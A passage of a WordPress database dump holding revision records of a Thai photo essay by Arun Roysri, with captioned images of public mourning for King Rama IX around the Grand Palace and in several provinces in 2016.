style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:54:27', '2018-11-12 07:54:27', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4399, 3, '2018-11-12 14:56:03', '2018-11-12 07:56:03', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:56:03', '2018-11-12 07:56:03', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4400, 3, '2018-11-12 14:57:52', '2018-11-12 07:57:52', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 